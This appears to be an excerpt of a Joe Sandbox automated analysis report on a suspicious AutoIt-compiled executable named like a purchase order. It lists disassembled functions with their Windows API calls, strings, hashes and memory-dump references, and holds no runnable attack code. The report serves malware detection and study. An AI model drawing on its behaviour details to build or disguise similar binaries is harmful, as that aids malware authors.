                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                • String ID:
                • API String ID: 1291720006-3916222277
                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                • IsMenu.USER32(?), ref: 0045FC5F
                • CreatePopupMenu.USER32 ref: 0045FC97
                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                APIs
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                • VariantClear.OLEAUT32(?), ref: 00435320
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                • VariantClear.OLEAUT32(?), ref: 004353B3
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                • String ID: crts
                • API String ID: 586820018-3724388283
                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                • _wcscat.LIBCMT ref: 0044BCAF
                • _wcslen.LIBCMT ref: 0044BCBB
                • _wcslen.LIBCMT ref: 0044BCD1
                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                • String ID: \*.*
                • API String ID: 2326526234-1173974218
                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                • _wcslen.LIBCMT ref: 004335F2
                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                • GetLastError.KERNEL32 ref: 0043362B
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                • _wcsrchr.LIBCMT ref: 00433666
                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                • String ID: \
                • API String ID: 321622961-2967466578
                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                • API String ID: 1038674560-2734436370
                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                • __lock.LIBCMT ref: 00417981
                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                • __lock.LIBCMT ref: 004179A2
                • ___addlocaleref.LIBCMT ref: 004179C0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL$pI
                • API String ID: 637971194-197072765
                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_malloc
                • String ID:
                • API String ID: 1938898002-0
                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                • _memmove.LIBCMT ref: 0044B555
                • _memmove.LIBCMT ref: 0044B578
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                • String ID:
                • API String ID: 2737351978-0
                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                Download Yara Rule
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                • __calloc_crt.LIBCMT ref: 00415246
                • __getptd.LIBCMT ref: 00415253
                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                • _free.LIBCMT ref: 0041529E
                • __dosmaperr.LIBCMT ref: 004152A9
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 3638380555-0
                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 0046C96E
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorInitLast
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 3207048006-625585964
                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                Download Yara Rule
                APIs
                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                • gethostbyname.WSOCK32(?), ref: 004655A6
                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                • _memmove.LIBCMT ref: 004656CA
                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                • WSACleanup.WSOCK32 ref: 00465762
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                • String ID:
                • API String ID: 2945290962-0
                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                Download Yara Rule
                APIs
                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                • String ID:
                • API String ID: 1457242333-0
                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcstok.LIBCMT ref: 004675B2
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcscpy.LIBCMT ref: 00467641
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcslen.LIBCMT ref: 004677BD
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
